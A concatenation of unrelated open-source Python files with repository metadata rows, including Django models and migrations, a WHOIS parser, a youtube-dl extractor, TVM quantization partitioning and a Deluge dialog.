# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'KBaseSearchEngine', u'KBaseSearchEngine Documentation',
author, 'KBaseSearchEngine', 'One line description of project.',
'Miscellaneous'),
]
| mit | -4,442,942,069,847,366,700 | 29.453488 | 79 | 0.682321 | false |
ofer43211/unisubs | utils/html.py | 6 | 1024 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import htmllib, formatter
def unescape(s):
p = htmllib.HTMLParser(formatter.NullFormatter() )
# we need to preserve line breaks, nofill makes sure we don't
# loose them
p.nofill = True
p.save_bgn()
p.feed(s)
return p.save_end().strip()
| agpl-3.0 | 5,050,333,931,074,619,000 | 35.571429 | 74 | 0.740234 | false |
brunosmmm/hdltools | hdltools/vcd/trigger/event.py | 1 | 1166 | """Trigger event."""
from typing import Optional
from hdltools.vcd import VCDObject
from hdltools.vcd.trigger import VCDTriggerDescriptor
class VCDTriggerEvent(VCDObject):
"""VCD trigger event."""
EVENT_TYPES = ("condition", "trigger")
def __init__(
self,
evt_type: str,
time: int,
evt: Optional[VCDTriggerDescriptor] = None,
):
"""Initialize."""
if not isinstance(time, int):
raise TypeError("time must be an integer")
self._time = time
if evt_type not in self.EVENT_TYPES:
raise ValueError("invalid event type")
self._type = evt_type
if evt is None:
self._evt = None
elif not isinstance(evt, VCDTriggerDescriptor):
raise TypeError("evt must be a VCDTriggerDescriptor object")
else:
self._evt = evt
@property
def time(self):
"""Get occurrence time."""
return self._time
@property
def evt_type(self):
"""Get event type."""
return self._type
@property
def evt(self):
"""Get trigger descriptor."""
return self._evt
| mit | -8,231,810,253,720,325,000 | 23.808511 | 72 | 0.577187 | false |
meshulam/chicago-justice | cjp/crimedata/models.py | 1 | 6764 | from django.db import models
from django.db import connection
import datetime
class CrimeReport(models.Model):
orig_ward = models.CharField(max_length=5, db_index=True) # character varying(5) NOT NULL,
orig_rd = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
orig_beat_num = models.CharField(max_length=8, db_index=True) # character varying(8),
orig_location_descr = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_fbi_descr = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_domestic_i = models.CharField(max_length=4, db_index=True) # character varying(4) NOT NULL,
orig_status = models.CharField(max_length=50, db_index=True) # character varying(50) NOT NULL,
orig_street = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_fbi_cd = models.CharField(max_length=10, db_index=True) # character varying(10) NOT NULL,
orig_dateocc = models.CharField(max_length=50, db_index=True) # character varying(50) NOT NULL,
orig_stnum = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
orig_description = models.CharField(max_length=150, db_index=True) # character varying(150) NOT NULL,
orig_stdir = models.CharField(max_length=10, db_index=True) # character varying(10) NOT NULL,
orig_curr_iucr = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_case_num = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_date = models.DateTimeField(db_index=True) # timestamp without time zone NOT NULL,
web_block = models.CharField(max_length=200, db_index=True) # character varying(200) NOT NULL,
web_code = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_crime_type = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
web_secondary = models.CharField(max_length=150, db_index=True) # character varying(150) NOT NULL,
web_arrest = models.CharField(max_length=1, db_index=True) # character(1) NOT NULL,
web_location = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
web_domestic = models.CharField(max_length=4, db_index=True) # character varying(4) NOT NULL,
web_beat = models.CharField(max_length=8, db_index=True) # character varying(8) NOT NULL,
web_ward = models.CharField(max_length=5, db_index=True) # character varying(5) NOT NULL,
web_nibrs = models.CharField(max_length=11, db_index=True) # character varying(11) NOT NULL,
crime_date = models.DateField(db_index=True) # date NOT NULL,
crime_time = models.TimeField(db_index=True)
geocode_latitude = models.FloatField(db_index=True) # double precision NOT NULL,
geocode_longitude = models.FloatField(db_index=True) # double precision NOT NULL
class LookupCRCrimeDateMonth(models.Model):
year = models.SmallIntegerField(db_index=True)
month = models.SmallIntegerField(db_index=True)
the_date = models.DateField()
@staticmethod
def createLookup():
LookupCRCrimeDateMonth.objects.all().delete()
months = CrimeReport.objects.extra(select={
'month_date': "to_char(crime_date, 'YYYY-MM')",
'the_month' : 'extract(month from crime_date)',
'the_year' : 'extract(year from crime_date)'})
months = months.values('month_date', 'the_month', 'the_year').order_by('month_date').distinct()
for m in months:
lcrm = LookupCRCrimeDateMonth(year=int(m['the_year']),
month=int(m['the_month']),
the_date=datetime.date(int(m['the_year']), int(m['the_month']), 1))
lcrm.save()
class LookupCRCode(models.Model):
web_code = models.CharField(max_length=20, db_index=True)
@staticmethod
def createLookup():
LookupCRCode.objects.all().delete()
codes = CrimeReport.objects.all().values('web_code').order_by('web_code').distinct()
for code in codes:
lcr = LookupCRCode(web_code=code['web_code'])
lcr.save()
class LookupCRCrimeType(models.Model):
web_crime_type = models.CharField(max_length=100, db_index=True)
@staticmethod
def createLookup():
LookupCRCrimeType.objects.all().delete()
crimeTypes = CrimeReport.objects.all().values('web_crime_type').order_by('web_crime_type').distinct()
for crimeType in crimeTypes:
if len(crimeType['web_crime_type']) > 0:
lcrt = LookupCRCrimeType(web_crime_type=crimeType['web_crime_type'])
lcrt.save()
class LookupCRSecondary(models.Model):
web_secondary = models.CharField(max_length=150, db_index=True)
@staticmethod
def createLookup():
LookupCRSecondary.objects.all().delete()
secondaries = CrimeReport.objects.all().values('web_secondary').order_by('web_secondary').distinct()
for secondary in secondaries:
if len(secondary['web_secondary']) > 0:
lcrs = LookupCRSecondary(web_secondary=secondary['web_secondary'])
lcrs.save()
class LookupCRBeat(models.Model):
web_beat = models.CharField(max_length=8, db_index=True)
@staticmethod
def createLookup():
LookupCRBeat.objects.all().delete()
beats = CrimeReport.objects.all().values('web_beat').order_by('web_beat').distinct()
for beat in beats:
if len(beat['web_beat']) > 0:
lcrb = LookupCRBeat(web_beat=beat['web_beat'])
lcrb.save()
class LookupCRWard(models.Model):
web_ward = models.CharField(max_length=5, db_index=True)
@staticmethod
def createLookup():
LookupCRWard.objects.all().delete()
wards = CrimeReport.objects.all().values('web_ward').order_by('web_ward').distinct()
for ward in wards:
if len(ward['web_ward']) > 0:
lcrw = LookupCRWard(web_ward=ward['web_ward'])
lcrw.save()
class LookupCRNibrs(models.Model):
web_nibrs = models.CharField(max_length=11, db_index=True)
@staticmethod
def createLookup():
LookupCRNibrs.objects.all().delete()
nibrss = CrimeReport.objects.all().values('web_nibrs').order_by('web_nibrs').distinct()
for nibrs in nibrss:
if len(nibrs['web_nibrs']) > 0:
lcrn = LookupCRNibrs(web_nibrs=nibrs['web_nibrs'])
lcrn.save() | gpl-3.0 | 917,793,423,594,398,500 | 49.111111 | 110 | 0.648137 | false |
huyphan/pyyawhois | yawhois/parser/base_shared2.py | 1 | 3211 | from .base_scannable import ScannableParserBase
from ..scanner.base_shared2 import BaseShared2Scanner
from ..utils import array_wrapper
from ..record import Nameserver
from ..record import Contact
from ..record import Registrar
from dateutil import parser as time_parser
class BaseShared2Parser(ScannableParserBase):
_scanner = BaseShared2Scanner
@property
def domain(self):
if self.node("Domain Name"):
return self.node("Domain Name").lower()
@property
def domain_id(self):
return self.node("Domain ID")
@property
def status(self):
if self.node("Domain Status"):
return array_wrapper(self.node("Domain Status"))
@property
def available(self):
return bool(self.node("status:available"))
@property
def registered(self):
return not self.available
@property
def created_on(self):
if self.node("Domain Registration Date"):
return time_parser.parse(self.node("Domain Registration Date"))
@property
def updated_on(self):
if self.node("Domain Last Updated Date"):
return time_parser.parse(self.node("Domain Last Updated Date"))
@property
def expires_on(self):
if self.node("Domain Expiration Date"):
return time_parser.parse(self.node("Domain Expiration Date"))
@property
def registrar(self):
if self.node("Sponsoring Registrar"):
return Registrar(id = self.node("Sponsoring Registrar IANA ID"), name = self.node("Sponsoring Registrar"))
@property
def registrant_contacts(self):
return self._build_contact("Registrant", Contact.TYPE_REGISTRANT)
@property
def admin_contacts(self):
return self._build_contact("Administrative Contact", Contact.TYPE_ADMINISTRATIVE)
@property
def technical_contacts(self):
return self._build_contact("Technical Contact", Contact.TYPE_TECHNICAL)
@property
def nameservers(self):
return [Nameserver(name = name.lower()) for name in array_wrapper(self.node("Name Server"))]
def _build_contact(self, element, type_):
if self.node("%s ID" % element):
address = "\n".join(filter(None, [self.node("%s Address%d" % (element, i)) for i in range(1, 4)]))
return Contact(**{
'type' : type_,
'id' : self.node("%s ID" % element),
'name' : self.node("%s Name" % element),
'organization' : self.node("%s Organization" % element),
'address' : address,
'city' : self.node("%s City" % element),
'zip' : self.node("%s Postal Code" % element),
'state' : self.node("%s State/Province" % element),
'country' : self.node("%s Country" % element),
'country_code' : self.node("%s Country Code" % element),
'phone' : self.node("%s Phone Number" % element),
'fax' : self.node("%s Facsimile Number" % element),
'email' : self.node("%s Email" % element)
})
| mit | 9,131,807,655,424,589,000 | 34.688889 | 118 | 0.58611 | false |
azumimuo/family-xbmc-addon | script.module.youtube.dl/lib/youtube_dl/extractor/egghead.py | 7 | 1342 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class EggheadCourseIE(InfoExtractor):
IE_DESC = 'egghead.io course'
IE_NAME = 'egghead:course'
_VALID_URL = r'https://egghead\.io/courses/(?P<id>[^/?#&]+)'
_TEST = {
'url': 'https://egghead.io/courses/professor-frisby-introduces-composable-functional-javascript',
'playlist_count': 29,
'info_dict': {
'id': 'professor-frisby-introduces-composable-functional-javascript',
'title': 'Professor Frisby Introduces Composable Functional JavaScript',
'description': 're:(?s)^This course teaches the ubiquitous.*You\'ll start composing functionality before you know it.$',
},
}
def _real_extract(self, url):
playlist_id = self._match_id(url)
course = self._download_json(
'https://egghead.io/api/v1/series/%s' % playlist_id, playlist_id)
entries = [
self.url_result(
'wistia:%s' % lesson['wistia_id'], ie='Wistia',
video_id=lesson['wistia_id'], video_title=lesson.get('title'))
for lesson in course['lessons'] if lesson.get('wistia_id')]
return self.playlist_result(
entries, playlist_id, course.get('title'),
course.get('description'))
| gpl-2.0 | -3,845,287,956,764,960,000 | 37.342857 | 132 | 0.607303 | false |
pashinin-com/pashinin.com | src/core/migrations/0001_initial.py | 1 | 2313 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-30 11:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '__first__'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('added', models.DateTimeField(auto_now_add=True, db_index=True)),
('changed', models.DateTimeField(auto_now=True, db_index=True)),
('email', models.EmailField(db_index=True, max_length=255, unique=True, verbose_name='Email')),
('username', models.CharField(db_index=True, max_length=200)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('date_joined', models.DateTimeField(auto_now_add=True, db_index=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('date_last_pass_sent', models.DateTimeField(null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'User',
'verbose_name_plural': 'Users',
},
),
]
| gpl-3.0 | -2,121,084,785,230,692,900 | 54.071429 | 266 | 0.607869 | false |
pidah/st2contrib | packs/openhab/actions/lib/action.py | 10 | 1686 | import requests
import base64
from st2actions.runners.pythonrunner import Action
class BaseAction(Action):
def __init__(self, config):
super(BaseAction, self).__init__(config)
self.auth = None
self.username = self.config.get('username', None)
self.password = self.config.get('password', None)
self.hostname = self.config.get('hostname', None)
self.port = self.config.get('port', 8080)
self.url = "{}:{}/rest/items".format(self.hostname, self.port)
if self.username and self.password:
self.auth = base64.encodestring(
'%s:%s' % (self.username, self.password)).replace('\n', '')
def _headers(self):
payload = {
"Content-type": "text/plain",
"Accept": "application/json"
}
if self.auth:
payload['Authentication'] = "Basic {}".format(self.auth)
return payload
def _get(self, key):
url = "{}/{}".format(self.url, key) if key else self.url
payload = {'type': 'json'}
req = requests.get(url, params=payload, headers=self._headers())
return self._parse_req(req)
def _put(self, key, value):
url = "{}/{}/state".format(self.url, key)
req = requests.put(url, data=value, headers=self._headers())
return self._parse_req(req)
def _post(self, key, value):
url = "{}/{}".format(self.url, key)
req = requests.post(url, data=value, headers=self._headers())
return self._parse_req(req)
def _parse_req(self, req):
req.raise_for_status()
try:
return req.json()
except:
return req.text
| apache-2.0 | -2,299,476,187,434,650,600 | 32.058824 | 75 | 0.568802 | false |
DXCanas/kolibri | kolibri/core/discovery/serializers.py | 1 | 1028 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.serializers import ValidationError
from .models import NetworkLocation
from .utils.network import errors
from .utils.network.client import NetworkClient
class NetworkLocationSerializer(serializers.ModelSerializer):
class Meta:
model = NetworkLocation
fields = ('id', 'available', 'base_url', 'device_name', 'instance_id', 'added', 'last_accessed', 'operating_system', 'application', 'kolibri_version')
read_only_fields = ('available', 'instance_id', 'added', 'last_accessed', 'operating_system', 'application', 'kolibri_version')
def validate_base_url(self, value):
try:
client = NetworkClient(address=value)
except errors.NetworkError as e:
raise ValidationError("Error with address {} ({})".format(value, e.__class__.__name__), code=e.code)
return client.base_url
| mit | 8,020,563,567,040,571,000 | 40.12 | 158 | 0.702335 | false |
fuzeman/Catalytic | deluge/ui/gtkui/new_release_dialog.py | 4 | 3566 | #
# new_release_dialog.py
#
# Copyright (C) 2008 Andrew Resch <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
import deluge.component as component
import deluge.common
from deluge.configmanager import ConfigManager
from deluge.ui.client import client
class NewReleaseDialog:
def __init__(self):
pass
def show(self, available_version):
self.config = ConfigManager("gtkui.conf")
glade = component.get("MainWindow").main_glade
self.dialog = glade.get_widget("new_release_dialog")
# Set the version labels
if deluge.common.windows_check() or deluge.common.osx_check():
glade.get_widget("image_new_release").set_from_file(
deluge.common.get_pixmap("deluge16.png"))
else:
glade.get_widget("image_new_release").set_from_icon_name("deluge", 4)
glade.get_widget("label_available_version").set_text(available_version)
glade.get_widget("label_client_version").set_text(
deluge.common.get_version())
self.chk_not_show_dialog = glade.get_widget("chk_do_not_show_new_release")
glade.get_widget("button_goto_downloads").connect(
"clicked", self._on_button_goto_downloads)
glade.get_widget("button_close_new_release").connect(
"clicked", self._on_button_close_new_release)
if client.connected():
def on_info(version):
glade.get_widget("label_server_version").set_text(version)
glade.get_widget("label_server_version").show()
glade.get_widget("label_server_version_text").show()
if not client.is_classicmode():
glade.get_widget("label_client_version_text").set_label(_("<i>Client Version</i>"))
client.daemon.info().addCallback(on_info)
self.dialog.show()
def _on_button_goto_downloads(self, widget):
deluge.common.open_url_in_browser("http://deluge-torrent.org")
self.config["show_new_releases"] = not self.chk_not_show_dialog.get_active()
self.dialog.destroy()
def _on_button_close_new_release(self, widget):
self.config["show_new_releases"] = not self.chk_not_show_dialog.get_active()
self.dialog.destroy()
| gpl-3.0 | -7,677,925,521,064,300,000 | 40.952941 | 99 | 0.675547 | false |
tqchen/tvm | python/tvm/relay/quantize/_partition_conversions.py | 1 | 13074 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-argument, not-context-manager
"""Utilities for partitioning input quantization and output dequantization expressions."""
import tvm
from tvm import relay
from tvm.relay.expr_functor import ExprMutator, ExprVisitor
# operators that are allowed in prefix/suffix partitions, because they are used
# to quantize/dequantize
ALLOWED_CONVERSION_OPS = ["add", "multiply", "right_shift", "clip", "round", "cast"]
def partition_conversions(mod, quantized_dtypes, ensure_fully_integral):
"""Partition mod into input quantization, core quantized inference, and output dequantization.
The resulting module includes an additional `main` that fuses all three
partitions together.
Parameters
----------
mod : tvm.IRModule
Quantized module to partition
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
ensure_fully_integral : bool
Whether to raise an exception if there are unquantized operators in the result
Returns
-------
fused_mod : tvm.IRModule
Module containing the input quantization (`quantize_inputs`), core
quantized inference (`quantized_main`), output dequantization
(`dequantize_outputs`), and full quantized inference functions
"""
# Partitioning is implemented as in the diagram below:
#
# +----------------------------+
# |Quantized Inference Function|
# +--------------+-------------+
# |
# partition_prefix
# |
# +-----+-------------------------+
# | |
# +--------v---------+ +-----------------v------------------+
# |Input Quantization| |Rest of Quantized Inference Function|
# +------------------+ +-----------------+------------------+
# |
# partition_suffix
# |
# +------+---------------------+
# | |
# +------------------+ +----------v------------+ +-----------v---------+
# |Input Quantization| |Core Quantized Function| |Output Dequantization|
# +------------------+ +-----------------------+ +---------------------+
#
# The final module contains all three partitions, as well as a
# `main` function that composes these three functions (depicted below).
#
# +--------------------+-------------------------+-----------------------+
# | Input Quantization | Core Quantized Function | Output Dequantization |
# +--------------------+-------------------------+-----------------------+
assert len(mod.functions) == 1
pre_mod, mid_mod = partition_prefix(mod, quantized_dtypes)
mid_mod, post_mod = partition_suffix(mid_mod, quantized_dtypes)
if ensure_fully_integral:
assert has_only_conversion_ops(pre_mod["main"])
assert relay.analysis.all_dtypes(mid_mod["main"]).issubset(quantized_dtypes)
assert has_only_conversion_ops(post_mod["main"])
return fuse_partitions(pre_mod, mid_mod, post_mod)
def fuse_partitions(pre_mod, mid_mod, post_mod):
"""Combine prefix, middle, and suffix modules into a single module.
The combined module includes an additional `main` that fuses all three
partitions together.
Parameters
----------
pre_mod : tvm.IRModule
Module containing an input quantization function
mid_mod : tvm.IRModule
Module containing core of a quantized inference function
post_mod : tvm.IRModule
Module containing an output dequantization function
Returns
-------
fused_mod : tvm.IRModule
Module containing the input quantization, core quantized inference,
output dequantization, and full quantized inference functions
"""
pre_func = pre_mod["main"]
mid_func = mid_mod["main"]
post_func = post_mod["main"]
# create a module containing the prefix, middle, and suffix partitions
fused_mod = tvm.IRModule(
functions={
relay.GlobalVar("quantize_inputs"): pre_func,
relay.GlobalVar("quantized_main"): mid_func,
relay.GlobalVar("dequantize_outputs"): post_func,
}
)
# construct a `main` that strings together the partitions, such that its
# behaviour is equivalent to `main` in an *unpartitioned* module
scope_builder = relay.ScopeBuilder()
fused_mod_main_params = [relay.Var(param.name_hint) for param in pre_func.params]
quantized_inputs = scope_builder.let(
"quantized_inputs",
relay.Call(fused_mod.get_global_var("quantize_inputs"), fused_mod_main_params),
)
quantized_outputs = scope_builder.let(
"quantized_outputs",
relay.Call(
fused_mod.get_global_var("quantized_main"),
[relay.TupleGetItem(quantized_inputs, i) for i in range(len(pre_func.ret_type.fields))],
),
)
dequantized_outputs = scope_builder.let(
"dequantized_outputs",
relay.Call(fused_mod.get_global_var("dequantize_outputs"), [quantized_outputs]),
)
scope_builder.ret(dequantized_outputs)
fused_mod["main"] = relay.Function(fused_mod_main_params, scope_builder.get())
return fused_mod
class PrefixCutter(ExprMutator):
"""A mutator for extracting input quantization expressions from a function
The result of `visit` is the core function, and the input quantization
expressions are stored in the `prefix_sb` scope builder.
"""
def __init__(self, params, quantized_dtypes):
ExprMutator.__init__(self)
self.params = set(params)
self.quantized_dtypes = quantized_dtypes
self.subtree_params = set()
self.new_func_params = []
self.prefix_sb = relay.ScopeBuilder()
self.prefix_binding_map = {}
def visit_var(self, var):
if var in self.params:
self.subtree_params.add(var)
return var
def visit_call(self, call):
# TODO(weberlo) use graph pattern matching?
if not hasattr(call.op, "name") or call.op.name not in ALLOWED_CONVERSION_OPS:
new_args = []
for arg in call.args:
new_arg = self.visit(arg)
if len(self.subtree_params) == 0:
new_args.append(new_arg)
else:
assert len(self.subtree_params) == 1
param = next(iter(self.subtree_params))
pre_param = self.prefix_sb.let(param.name_hint, new_arg)
self.subtree_params.clear()
mid_param = relay.Var(param.name_hint, arg.checked_type)
self.prefix_binding_map[mid_param] = pre_param
# return new parameter, then we can use
# relay.analysis.free_vars at the end of the pass to generate
# new `mid_func` type signature
new_args.append(mid_param)
return relay.Call(call.op, new_args, call.attrs)
return super().visit_call(call)
def partition_prefix(mod, quantized_dtypes):
"""Extract input quantization expressions from `mod['main']`.
Parameters
----------
mod : tvm.IRModule
Module containing a quantized inference function
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
Returns
-------
pre_mod : tvm.IRModule
Module containing the input quantization function
mid_mod : tvm.IRModule
Module containing a function with everything except for input quantization
"""
assert len(mod.functions) == 1
func = mod["main"]
prefix_cutter = PrefixCutter(func.params, quantized_dtypes)
mid_body = prefix_cutter.visit(func.body)
assert not func.type_params, "unimplemented"
assert func.attrs is None, "unimplemented"
mid_func = relay.Function(relay.analysis.free_vars(mid_body), mid_body)
mid_mod = tvm.IRModule.from_expr(mid_func)
scope_builder = prefix_cutter.prefix_sb
# make sure we pass through all inputs in the prefix function's return expr
# (even those that don't require quantization)
ret_expr = []
for param in mid_func.params:
if param in prefix_cutter.prefix_binding_map:
# this param required a conversion, so we collected it in the
# prefix cutter pass, and we can use the pass's mapping from mid
# func params to pre func params
ret_expr.append(prefix_cutter.prefix_binding_map[param])
else:
# there was no detected conversion for this argument, so we thread
# it through the prefix function untouched
ret_expr.append(relay.Var(param.name_hint, param.checked_type))
ret_expr = relay.Tuple(ret_expr)
scope_builder.ret(ret_expr)
pre_func_body = scope_builder.get()
pre_func = relay.Function(relay.analysis.free_vars(pre_func_body), pre_func_body)
pre_mod = tvm.IRModule.from_expr(pre_func)
return pre_mod, mid_mod
class SuffixCutter(ExprMutator):
"""A mutator for extracting output dequantization expressions from a function
The result of `visit` is a function containing the output dequantization
expressions, and the middle of the function is stored in `mid_body`.
"""
def __init__(self, quantized_dtypes):
ExprMutator.__init__(self)
self.mid_body = None
self.quantized_dtypes = quantized_dtypes
def visit(self, expr):
if hasattr(expr, "checked_type") and expr.checked_type.dtype in self.quantized_dtypes:
self.mid_body = expr
return relay.Var("input", expr.checked_type)
return super().visit(expr)
def partition_suffix(mod, quantized_dtypes):
"""Extract output dequantization expressions from `mod['main']`.
Parameters
----------
mod : tvm.IRModule
Module containing a quantized inference function
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
Returns
-------
pre_mod : tvm.IRModule
Module containing the input quantization function
mid_mod : tvm.IRModule
Module containing a function with everything except for input quantization
"""
assert len(mod.functions) == 1
func = mod["main"]
suffix_cutter = SuffixCutter(quantized_dtypes)
post_body = suffix_cutter.visit(func.body)
assert not func.type_params, "unimplemented"
assert func.attrs is None, "unimplemented"
post_func = relay.Function(relay.analysis.free_vars(post_body), post_body, func.ret_type)
post_mod = tvm.IRModule.from_expr(post_func)
mid_body = suffix_cutter.mid_body
if mid_body is None:
# The suffix contains the entire function, meaning there was no
# quantization boundary in the given mod. In this case, we use the
# suffix mod as the middle mod and make the suffix an identity function.
mid_mod = post_mod
post_body = relay.Var("input", mid_mod["main"].ret_type)
post_func = relay.Function([post_body], post_body)
post_mod = tvm.IRModule.from_expr(post_func)
else:
mid_func = relay.Function(func.params, mid_body)
mid_mod = tvm.IRModule.from_expr(mid_func)
return mid_mod, post_mod
class ConversionOpChecker(ExprVisitor):
"""A pass for checking that the visited function contains only conversion ops"""
def __init__(self):
ExprVisitor.__init__(self)
self.valid = True
def visit_call(self, call):
if not hasattr(call.op, "name") or call.op.name not in ALLOWED_CONVERSION_OPS:
self.valid = False
super().visit_call(call)
def has_only_conversion_ops(func):
"""Return true iff the given function contains only quantization/dequantization ops.
Parameters
----------
func : relay.Function
Function being checked
Returns
-------
valid : bool
Whether the function contains only conversion ops
"""
checker = ConversionOpChecker()
checker.visit(func)
return checker.valid
| apache-2.0 | -4,459,951,679,981,442,000 | 37.910714 | 100 | 0.614043 | false |
pyoseo/django-oseoserver | oseoserver/serializers.py | 1 | 2314 | import dateutil.parser
import pytz
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from . import models
from . import settings
class SubscriptionOrderSerializer(serializers.ModelSerializer):
class Meta:
model = models.Order
fields = (
"id",
"status",
"additional_status_info",
"completed_on",
"status_changed_on",
"remark",
)
read_only_fields =(
"id",
"status",
"additional_status_info",
"completed_on",
"status_changed_on",
)
def create(self, validated_data):
return models.Order.objects.create(
order_type=models.Order.SUBSCRIPTION_ORDER,
**validated_data
)
class SubscriptionProcessTimeslotSerializer(serializers.BaseSerializer):
def to_internal_value(self, data):
try:
timeslot = dateutil.parser.parse(data.get("timeslot"))
timeslot = timeslot.replace(
tzinfo=pytz.utc) if timeslot.tzinfo is None else timeslot
except ValueError:
raise ValidationError({"timeslot": "Invalid timeslot format"})
except TypeError:
raise ValidationError({"timeslot": "This field is required"})
collection = data.get("collection")
if collection is None:
raise ValidationError({"collection": "This field is required"})
elif collection not in (c["name"] for c in settings.get_collections()):
raise ValidationError({"collection": "Invalid collection"})
force_creation = data.get("force_creation", False)
return {
"timeslot": timeslot,
"collection": collection,
"force_creation": force_creation,
}
class SubscriptionBatchSerializer(serializers.ModelSerializer):
class Meta:
model = models.Batch
fields = (
"id",
"order",
"completed_on",
"updated_on",
"status",
"additional_status_info",
)
read_only_fields = (
"id",
"completed_on",
"updated_on",
"status",
"additional_status_info",
)
| apache-2.0 | -7,736,547,799,650,802,000 | 28.291139 | 79 | 0.564823 | false |
dbrattli/OSlash | oslash/typing/functor.py | 1 | 1141 | from abc import abstractmethod
from typing import TypeVar, Protocol, Callable
from typing_extensions import runtime_checkable
TSource = TypeVar('TSource', covariant=True)
TResult = TypeVar('TResult')
@runtime_checkable
class Functor(Protocol[TSource]):
"""The Functor class is used for types that can be mapped over.
Instances of Functor should satisfy the following laws:
Haskell:
fmap id == id
fmap (f . g) == fmap f . fmap g
Python:
x.map(id) == id(x)
x.map(compose(f, g)) == x.map(g).map(f)
The instances of Functor for lists, Maybe and IO satisfy these laws.
"""
@abstractmethod
def map(self, fn: Callable[[TSource], TResult]) -> 'Functor[TResult]':
"""Map a function over wrapped values.
Map knows how to apply functions to values that are wrapped in
a context.
"""
raise NotImplementedError
# def __rmod__(self, fn):
# """Infix version of map.
# Haskell: <$>
# Example:
# >>> (lambda x: x+2) % Just(40)
# 42
# Returns a new Functor.
# """
# return self.map(fn)
| apache-2.0 | 3,561,620,570,025,413,600 | 23.804348 | 74 | 0.606486 | false |
Tima-Is-My-Association/TIMA | association/migrations/0002_word.py | 1 | 1066 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import association.models
class Migration(migrations.Migration):
dependencies = [
('association', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Word',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('name', association.models.TextFieldSingleLine()),
('count', models.BigIntegerField(default=0)),
('language', models.ForeignKey(related_name='words', to='association.Language')),
],
options={
'ordering': ('name',),
},
),
migrations.AlterUniqueTogether(
name='word',
unique_together=set([('name', 'language')]),
),
]
| lgpl-3.0 | 4,240,898,878,019,281,400 | 31.30303 | 114 | 0.547842 | false |
aewallin/openvoronoi | python_examples/issues/polygon_2015-02-19.py | 1 | 4928 | import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
import ovdgenerators as gens
def drawLine(myscreen, pt1, pt2, lineColor):
